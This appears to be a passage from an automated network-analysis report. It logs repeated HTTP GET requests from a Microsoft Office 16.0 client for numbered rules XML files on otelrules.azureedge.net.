Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
